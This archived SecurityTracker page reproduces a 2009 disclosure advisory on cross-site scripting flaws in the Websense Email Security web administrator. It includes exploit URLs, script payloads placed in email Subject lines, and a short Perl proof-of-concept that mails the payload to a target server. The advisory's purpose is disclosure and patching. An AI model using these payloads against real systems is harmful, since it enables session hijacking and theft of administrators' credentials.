SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   Websense Vendors:   Websense
Websense Email Security Input Validation Flaws in Administrative Interface Permis Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1023069
SecurityTracker URL:  http://securitytracker.com/id/1023069
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Updated:  Oct 23 2009
Original Entry Date:  Oct 21 2009
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 7.1 prior to Hotfix 4
Description:   A vulnerability was reported in Websense Email Security. A remote user can conduct cross-site scripting attacks.

The administrative interface does not properly filter HTML code from user-supplied input before displaying the input. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the Websense software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Some demonstration exploit URLs are provided:

http://[target]:8181/web/msgList/viewmsg/actions
/msgAnalyse.asp?Queue=Network%20Security&FileName=[XSS]&IsolatedMessageID=[XSS]
&ServerName=[XSS]&Dictionary=[XSS]&Scoring=[XSS]&MessagePart=[XSS]

http://[target]:8181/web/msgList/viewmsg/actions/msgForwardToRis
kFilter.asp?Queue=[XSS]&FileName=[XSS]&IsolatedMessageID=[XSS]&
ServerName=[XSS]

http://[target]:8181/web/msgList/viewmsg/viewHeaders.asp?Queue=
[XSS]&FileName=[XSS]&IsolatedMessageID=[XSS]&ServerName=[XSS]

The Subject field of processed e-mail is also affected.

The vendor was notified on October 1, 2009.

Personal Email Manager is also affected.

Nikolas Sotiriu of NSO Research reported this vulnerability.

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the Websense Email Security software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Solution:   The vendor has issued a fix (7.1 Hotfix 4, 7.2).

The vendor's advisory is available at:

http://kb.websense.com/display/4/kb/article.aspx?aid=4786

Vendor URL:  kb.websense.com/display/4/kb/article.aspx?aid=4786 (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Red Hat Enterprise), Linux (Red Hat Fedora), UNIX (Solaris - SunOS), Windows (2000), Windows (2003)

Message History:   None.


 Source Message Contents

Subject:  NSOADV-2009-003: Websense Email Security Cross Site Scripting

_________________________________________
Security Advisory NSOADV-2009-003
_________________________________________
_________________________________________


  Title:                  Websense Email Security Cross Site Scripting
  Severity:               Low
  Advisory ID:            NSOADV-2009-003
  Found Date:             28.09.2009
  Date Reported:          01.10.2009
  Release Date:           20.10.2009
  Author:                 Nikolas Sotiriu
  Mail:                   nso-research (at) sotiriu.de
  URL:                    http://sotiriu.de/adv/NSOADV-2009-003.txt
  Vendor:                 Websense (http://www.websense.com/)
  Affected Products:      Websense Email Security v7.1
                          Personal Email Manager v7.1
  Not Affected Products:  Websense Email Security v7.1 Hotfix 4
                          Personal Email Manager v7.1 Hotfix 4
  Remote Exploitable:     Yes
  Local Exploitable:      Yes
  Patch Status:           Patched with Hotfix 4
  Disclosure Policy:      http://sotiriu.de/policy.html
  Thanks to:              Thierry Zoller: for the permission to use his
                                          Policy



Background:
===========

Websense Email Security software incorporates multiple layers of
real-time Web security and data security intelligence to provide
leading email protection from converged email and Web 2.0 threats.
It helps to manage outbound data leaks and compliance risk, and enables
a consolidated security strategy with the trusted leader in Essential
Information Protection.

(Product description from Websense Website)

The Websense Email Security Web Administrator is a webfrontend, which
enables you to access the message administration, directory management
and to view the log.



Description:
============

1. XSS in webfrontend:
----------------------

The webfrontend do not properly sanitize some variables before being
returned to the user.

http://<target>:8181/web/msgList/viewmsg/actions/msgAnalyse.asp \
?Queue=Network%20Security&FileName=[XSS]&IsolatedMessageID=[XSS] \
&ServerName=[XSS]&Dictionary=[XSS]&Scoring=[XSS]&MessagePart=[XSS]

http://<target>:8181/web/msgList/viewmsg/actions/msgForwardToRis \
kFilter.asp?Queue=[XSS]&FileName=[XSS]&IsolatedMessageID=[XSS]& \
ServerName=[XSS]

http://<target>:8181/web/msgList/viewmsg/viewHeaders.asp?Queue= \
[XSS]&FileName=[XSS]&IsolatedMessageID=[XSS]&ServerName=[XSS]

This can be exploited to execute arbitrary HTML and script code in a
user's browser session in context of the Web Administrator frontend.


2. XSS in webfrontend through a Mail Subject:
---------------------------------------------

The Subject of an email sent through the Websense Mail Security
server is not properly sanitized before shown in the Web Administrator
frontend.

Script code like "><script>alert('X')</script> will be executed in
the users's browser in context of the Web Administrator frontend.

The Mail has to be hold in a Queue to execute the code if the
administrator checks it. A Subject like

VIAGRA"><script>alert('XSS')</script>

will result in a hold in the Anti Spam Queue.



Proof of Concept :
==================

#!/usr/bin/perl
use MIME::Lite;
use Net::SMTP;

(($server = $ARGV[0]) && ($rcpt = $ARGV[1])) || die "Usage: $0",
"<server> <Recipient> \n";

my $from_address = '<xss@mail.com>';
my $to_address = "<" . $rcpt . ">";
my $mail_host = $server;

my $subject = 'VIAGRA XSS File "><BODY ONLOAD=alert(\'XSS\')>';
my $message_body = "XSS Test File";

$msg = MIME::Lite->new (
  From => $from_address,
  To => $to_address,
  Subject => $subject,
  Type =>'multipart/mixed'
) or die "Error creating multipart container: $!\n";

$msg->attach (
  Type => 'TEXT',
  Data => $message_body
) or die "Error adding the text message part: $!\n";

MIME::Lite->send('smtp', $mail_host, Timeout=>60);
$msg->send;



Solution:
=========

Vendor released a patch.

http://tinyurl.com/yhe3hqa



Disclosure Timeline (YYYY/MM/DD):
=================================

2009.09.28: Vulnerability found
2009.10.01: Ask for a PGP Key
2009.10.01: Websense sent there PGP Key
2009.10.01: Sent PoC, Advisory, Disclosure policy and planned disclosure
            date to Vendor
2009.10.08: Websense verifies the finding
2009.10.13: Websense fixed it. The path will be available in Version 7.2
            which will be released in ~2 weeks
2009.10.13: Ask for a list of affected versions/products and changed the
            release date to 2009.10.29.
            (no response)
2009.10.20: Found the KB article and the Hotfix on Websense website
2009.10.20: Release of this advisory









 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC